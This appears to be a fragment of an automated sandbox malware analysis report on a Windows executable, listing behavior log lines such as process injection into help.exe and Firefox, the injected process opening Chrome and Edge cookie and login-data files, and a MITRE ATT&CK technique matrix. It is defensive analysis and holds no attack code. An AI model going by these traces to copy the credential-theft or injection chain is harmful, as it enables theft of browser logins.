Source: C:\Program Files (x86)\EtFNDzdgxWzOkoBUssZxuMOhrAllqSLLrtnltdKCUnBcvXjavZuB\Q1NBabd2fJUnEL1mh.exe	NtQuerySystemInformation: Direct from: 0x77272DFC	Jump to behavior
Source: C:\Program Files (x86)\EtFNDzdgxWzOkoBUssZxuMOhrAllqSLLrtnltdKCUnBcvXjavZuB\Q1NBabd2fJUnEL1mh.exe	NtDelayExecution: Direct from: 0x77272DDC	Jump to behavior

Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Section loaded: NULL target: C:\Program Files (x86)\EtFNDzdgxWzOkoBUssZxuMOhrAllqSLLrtnltdKCUnBcvXjavZuB\Q1NBabd2fJUnEL1mh.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Section loaded: NULL target: C:\Windows\SysWOW64\help.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Section loaded: NULL target: C:\Program Files (x86)\EtFNDzdgxWzOkoBUssZxuMOhrAllqSLLrtnltdKCUnBcvXjavZuB\Q1NBabd2fJUnEL1mh.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Section loaded: NULL target: C:\Program Files (x86)\EtFNDzdgxWzOkoBUssZxuMOhrAllqSLLrtnltdKCUnBcvXjavZuB\Q1NBabd2fJUnEL1mh.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Source: Q1NBabd2fJUnEL1mh.exe, 0000000B.00000002.3753348371.0000000001990000.00000002.00000001.00040000.00000000.sdmp, Q1NBabd2fJUnEL1mh.exe, 0000000B.00000000.1383622941.0000000001990000.00000002.00000001.00040000.00000000.sdmp, Q1NBabd2fJUnEL1mh.exe, 00000010.00000002.3753614880.0000000000C20000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: Q1NBabd2fJUnEL1mh.exe, 0000000B.00000002.3753348371.0000000001990000.00000002.00000001.00040000.00000000.sdmp, Q1NBabd2fJUnEL1mh.exe, 0000000B.00000000.1383622941.0000000001990000.00000002.00000001.00040000.00000000.sdmp, Q1NBabd2fJUnEL1mh.exe, 00000010.00000002.3753614880.0000000000C20000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: Q1NBabd2fJUnEL1mh.exe, 0000000B.00000002.3753348371.0000000001990000.00000002.00000001.00040000.00000000.sdmp, Q1NBabd2fJUnEL1mh.exe, 0000000B.00000000.1383622941.0000000001990000.00000002.00000001.00040000.00000000.sdmp, Q1NBabd2fJUnEL1mh.exe, 00000010.00000002.3753614880.0000000000C20000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: Q1NBabd2fJUnEL1mh.exe, 0000000B.00000002.3753348371.0000000001990000.00000002.00000001.00040000.00000000.sdmp, Q1NBabd2fJUnEL1mh.exe, 0000000B.00000000.1383622941.0000000001990000.00000002.00000001.00040000.00000000.sdmp, Q1NBabd2fJUnEL1mh.exe, 00000010.00000002.3753614880.0000000000C20000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Queries volume information: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report AAHiVVNIKQESryT.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
AAHiVVNIKQESryT.exe

Source: C:\Windows\SysWOW64\help.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	412 Process Injection	1 Masquerading	1 OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Abuse Elevation Control Mechanism	11 Disable or Modify Tools	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	41 Virtualization/Sandbox Evasion	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	412 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Abuse Elevation Control Mechanism	Cached Domain Credentials	113 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	4 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	12 Software Packing	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 DLL Side-Loading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement